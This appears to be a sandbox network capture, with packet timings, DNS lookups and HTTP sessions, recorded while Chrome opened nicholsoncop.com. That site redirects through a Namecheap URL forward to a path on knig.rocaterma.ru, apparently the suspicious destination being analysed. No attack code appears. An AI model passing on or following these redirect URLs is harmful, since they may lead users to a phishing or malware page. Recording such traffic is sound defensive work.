                                Mar 25, 2025 00:59:41.950717926 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.950757980 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.950768948 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.950793982 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.952744007 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.952765942 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.952807903 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.952816010 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.952841997 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.953608990 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.953646898 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.953664064 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.953671932 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.953705072 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.955595016 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.955619097 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.955655098 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.955663919 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.955703974 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.955718994 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.955724001 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.957433939 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.957463026 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.957494020 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.957500935 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.957532883 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.959180117 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.959203959 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.959242105 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.959249973 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.959275007 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.961041927 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.961117029 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.961118937 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.961153984 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.961184978 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.961631060 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.961699009 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.961709023 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.963649988 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.963690042 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.963712931 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.963725090 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.963762045 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.965665102 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.965711117 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.965739965 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.965749979 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.965774059 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.967360973 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.967398882 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.967431068 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.967441082 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.967466116 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.969402075 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.969446898 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.969492912 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.969504118 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.969547987 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.969574928 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.969641924 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.991930962 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.991972923 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.992012024 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.992029905 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.992053986 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.992072105 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.994118929 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.994188070 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.994189024 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.994215965 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.994241953 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.994257927 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.994307041 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.995719910 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.995759964 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.995781898 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.995790958 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.995821953 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.997783899 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.997831106 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.997853041 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:41.997864962 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:41.997908115 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.027466059 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.027523994 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.027545929 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.027568102 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.027597904 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.029863119 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.029921055 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.029928923 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.029949903 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.029979944 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.031565905 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.031615019 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.031651020 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.031660080 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.031682968 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.031883001 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.031936884 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.032325029 CET49700443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.032341957 CET44349700172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.161107063 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.161150932 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.161286116 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.161432981 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.161448002 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.351716995 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.351802111 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.352875948 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.352885008 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.353286028 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.353537083 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.396331072 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.522726059 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.533555984 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.533612013 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.533660889 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.533674002 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.533745050 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.555021048 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.555046082 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.555089951 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.555094957 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.555139065 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.558784962 CET8049697192.64.119.145192.168.2.6
                                Mar 25, 2025 00:59:42.558873892 CET4969780192.168.2.6192.64.119.145
                                Mar 25, 2025 00:59:42.605695009 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.623126984 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.623162985 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.623234034 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.623243093 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.623296976 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.623322964 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.634371996 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.634408951 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.634465933 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.634471893 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.634521961 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.647795916 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.647825956 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.647883892 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.647888899 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.647938967 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.647967100 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.652734995 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.652831078 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.652832031 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.652903080 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.653227091 CET49708443192.168.2.6151.101.130.137
                                Mar 25, 2025 00:59:42.653242111 CET44349708151.101.130.137192.168.2.6
                                Mar 25, 2025 00:59:42.674021006 CET4969780192.168.2.6192.64.119.145
                                Mar 25, 2025 00:59:42.786822081 CET8049697192.64.119.145192.168.2.6
                                Mar 25, 2025 00:59:42.790967941 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.791002989 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.791205883 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.791346073 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.791357994 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.993604898 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.993959904 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.993977070 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:42.994157076 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:42.994162083 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:43.818360090 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:43.818439007 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:43.819972038 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:43.821619987 CET49709443192.168.2.6172.67.194.216
                                Mar 25, 2025 00:59:43.821638107 CET44349709172.67.194.216192.168.2.6
                                Mar 25, 2025 00:59:43.927799940 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:43.927843094 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:43.928327084 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:43.971267939 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:43.971285105 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.159795046 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.160006046 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.170979977 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.170993090 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.171283960 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.172005892 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.216315031 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.366013050 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.366087914 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.366138935 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.366460085 CET49711443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.366480112 CET4434971135.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.367324114 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.367367029 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.367433071 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.367609024 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.367616892 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.554629087 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.554979086 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.555003881 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.555160046 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.555165052 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.628200054 CET49695443192.168.2.6142.251.41.4
                                Mar 25, 2025 00:59:44.672327995 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.761930943 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.762006998 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.762056112 CET49695443192.168.2.6142.251.41.4
                                Mar 25, 2025 00:59:44.762074947 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.762418985 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.762468100 CET49695443192.168.2.6142.251.41.4
                                Mar 25, 2025 00:59:44.762478113 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.768268108 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.768317938 CET49695443192.168.2.6142.251.41.4
                                Mar 25, 2025 00:59:44.768572092 CET49695443192.168.2.6142.251.41.4
                                Mar 25, 2025 00:59:44.768584967 CET44349695142.251.41.4192.168.2.6
                                Mar 25, 2025 00:59:44.770577908 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.770719051 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.770761013 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.770865917 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.770883083 CET4434971235.190.80.1192.168.2.6
                                Mar 25, 2025 00:59:44.770896912 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:44.770925999 CET49712443192.168.2.635.190.80.1
                                Mar 25, 2025 00:59:55.342686892 CET8049696192.64.119.145192.168.2.6
                                Mar 25, 2025 00:59:55.348033905 CET4969680192.168.2.6192.64.119.145
                                Mar 25, 2025 00:59:56.025423050 CET4969680192.168.2.6192.64.119.145
                                Mar 25, 2025 00:59:56.132631063 CET8049696192.64.119.145192.168.2.6
                                Mar 25, 2025 01:00:07.388320923 CET49698443192.168.2.6192.64.119.145
                                Mar 25, 2025 01:00:07.432333946 CET44349698192.64.119.145192.168.2.6
                                Mar 25, 2025 01:00:36.138394117 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:36.138448000 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:36.138509989 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:36.138757944 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:36.138767958 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:36.329657078 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:36.349169970 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:36.349236965 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:41.575867891 CET4970280192.168.2.6142.251.40.163
                                Mar 25, 2025 01:00:41.664918900 CET8049702142.251.40.163192.168.2.6
                                Mar 25, 2025 01:00:41.664973974 CET4970280192.168.2.6142.251.40.163
                                Mar 25, 2025 01:00:46.328291893 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:46.328447104 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:46.328538895 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:48.036294937 CET49717443192.168.2.6142.251.41.4
                                Mar 25, 2025 01:00:48.036386967 CET44349717142.251.41.4192.168.2.6
                                Mar 25, 2025 01:00:52.434000015 CET49698443192.168.2.6192.64.119.145
                                Mar 25, 2025 01:00:52.434015989 CET44349698192.64.119.145192.168.2.6
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 25, 2025 00:59:31.727272034 CET53624361.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:31.846052885 CET53529031.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:32.502926111 CET53551151.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:36.076893091 CET5632753192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:36.077194929 CET4982253192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:36.173357010 CET53563271.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:36.174707890 CET53498221.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:37.224967003 CET5839353192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:37.225323915 CET5846953192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:37.235642910 CET5558653192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:37.235871077 CET6405053192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:37.329432964 CET53584691.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:37.334177017 CET53583931.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:37.340476036 CET53555861.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:37.380141020 CET53640501.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:40.345582008 CET6109053192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:40.345748901 CET5706253192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:40.696091890 CET53570621.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:40.700540066 CET53610901.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:42.062470913 CET5975553192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:42.062678099 CET5896453192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:42.160279036 CET53589641.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:42.160303116 CET53597551.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:42.872052908 CET53617601.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:43.819947004 CET6009553192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:43.820452929 CET5042553192.168.2.61.1.1.1
                                Mar 25, 2025 00:59:43.923402071 CET53600951.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:43.925154924 CET53504251.1.1.1192.168.2.6
                                Mar 25, 2025 00:59:49.535131931 CET53584941.1.1.1192.168.2.6
                                Mar 25, 2025 01:00:08.347493887 CET53546091.1.1.1192.168.2.6
                                Mar 25, 2025 01:00:19.119733095 CET138138192.168.2.6192.168.2.255
                                Mar 25, 2025 01:00:30.917814970 CET53624001.1.1.1192.168.2.6
                                Mar 25, 2025 01:00:31.413361073 CET53522401.1.1.1192.168.2.6
                                Mar 25, 2025 01:00:34.343790054 CET53618701.1.1.1192.168.2.6
                                TimestampSource IPDest IPChecksumCodeType
                                Mar 25, 2025 00:59:37.380203962 CET192.168.2.61.1.1.1c22e(Port unreachable)Destination Unreachable
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Mar 25, 2025 00:59:36.076893091 CET192.168.2.61.1.1.10x1244Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:36.077194929 CET192.168.2.61.1.1.10x1b7dStandard query (0)www.google.com65IN (0x0001)false
                                Mar 25, 2025 00:59:37.224967003 CET192.168.2.61.1.1.10x5527Standard query (0)nicholsoncop.comA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:37.225323915 CET192.168.2.61.1.1.10xc6cfStandard query (0)nicholsoncop.com65IN (0x0001)false
                                Mar 25, 2025 00:59:37.235642910 CET192.168.2.61.1.1.10x77a6Standard query (0)nicholsoncop.comA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:37.235871077 CET192.168.2.61.1.1.10xae27Standard query (0)nicholsoncop.com65IN (0x0001)false
                                Mar 25, 2025 00:59:40.345582008 CET192.168.2.61.1.1.10x9ee3Standard query (0)knig.rocaterma.ruA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:40.345748901 CET192.168.2.61.1.1.10xd3caStandard query (0)knig.rocaterma.ru65IN (0x0001)false
                                Mar 25, 2025 00:59:42.062470913 CET192.168.2.61.1.1.10xc304Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:42.062678099 CET192.168.2.61.1.1.10x794fStandard query (0)code.jquery.com65IN (0x0001)false
                                Mar 25, 2025 00:59:43.819947004 CET192.168.2.61.1.1.10x9a01Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:43.820452929 CET192.168.2.61.1.1.10xb6ddStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Mar 25, 2025 00:59:36.173357010 CET1.1.1.1192.168.2.60x1244No error (0)www.google.com142.251.41.4A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:36.174707890 CET1.1.1.1192.168.2.60x1b7dNo error (0)www.google.com65IN (0x0001)false
                                Mar 25, 2025 00:59:37.334177017 CET1.1.1.1192.168.2.60x5527No error (0)nicholsoncop.com192.64.119.145A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:37.340476036 CET1.1.1.1192.168.2.60x77a6No error (0)nicholsoncop.com192.64.119.145A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:40.696091890 CET1.1.1.1192.168.2.60xd3caNo error (0)knig.rocaterma.ru65IN (0x0001)false
                                Mar 25, 2025 00:59:40.700540066 CET1.1.1.1192.168.2.60x9ee3No error (0)knig.rocaterma.ru172.67.194.216A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:40.700540066 CET1.1.1.1192.168.2.60x9ee3No error (0)knig.rocaterma.ru104.21.36.139A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:42.160303116 CET1.1.1.1192.168.2.60xc304No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:42.160303116 CET1.1.1.1192.168.2.60xc304No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:42.160303116 CET1.1.1.1192.168.2.60xc304No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:42.160303116 CET1.1.1.1192.168.2.60xc304No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                Mar 25, 2025 00:59:43.923402071 CET1.1.1.1192.168.2.60x9a01No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                • knig.rocaterma.ru
                                  • code.jquery.com
                                • a.nel.cloudflare.com
                                • www.google.com
                                • nicholsoncop.com
                                • c.pki.goog
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649696192.64.119.145804920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                Mar 25, 2025 00:59:40.235582113 CET431OUTGET / HTTP/1.1
                                Host: nicholsoncop.com
                                Connection: keep-alive
                                Upgrade-Insecure-Requests: 1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Encoding: gzip, deflate
                                Accept-Language: en-US,en;q=0.9
                                Mar 25, 2025 00:59:40.342776060 CET303INHTTP/1.1 302 Found
                                Date: Mon, 24 Mar 2025 23:59:40 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 55
                                Connection: keep-alive
                                Location: https://knig.rocaterma.ru/krVkG/
                                X-Served-By: Namecheap URL Forward
                                Server: namecheap-nginx
                                Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 6e 69 67 2e 72 6f 63 61 74 65 72 6d 61 2e 72 75 2f 6b 72 56 6b 47 2f 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                Data Ascii: <a href='https://knig.rocaterma.ru/krVkG/'>Found</a>.


                                Session IDSource IPSource PortDestination IPDestination Port
                                1192.168.2.649702142.251.40.16380
                                TimestampBytes transferredDirectionData
                                Mar 25, 2025 00:59:41.193380117 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                Cache-Control: max-age = 3000
                                Connection: Keep-Alive
                                Accept: */*
                                If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                User-Agent: Microsoft-CryptoAPI/10.0
                                Host: c.pki.goog
                                Mar 25, 2025 00:59:41.284147024 CET223INHTTP/1.1 304 Not Modified
                                Date: Mon, 24 Mar 2025 23:39:48 GMT
                                Expires: Tue, 25 Mar 2025 00:29:48 GMT
                                Age: 1193
                                Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                Cache-Control: public, max-age=3000
                                Vary: Accept-Encoding
                                Mar 25, 2025 00:59:41.290163040 CET200OUTGET /r/r4.crl HTTP/1.1
                                Cache-Control: max-age = 3000
                                Connection: Keep-Alive
                                Accept: */*
                                If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                User-Agent: Microsoft-CryptoAPI/10.0
                                Host: c.pki.goog
                                Mar 25, 2025 00:59:41.379710913 CET223INHTTP/1.1 304 Not Modified
                                Date: Mon, 24 Mar 2025 23:30:24 GMT
                                Expires: Tue, 25 Mar 2025 00:20:24 GMT
                                Age: 1757
                                Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                Cache-Control: public, max-age=3000
                                Vary: Accept-Encoding


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
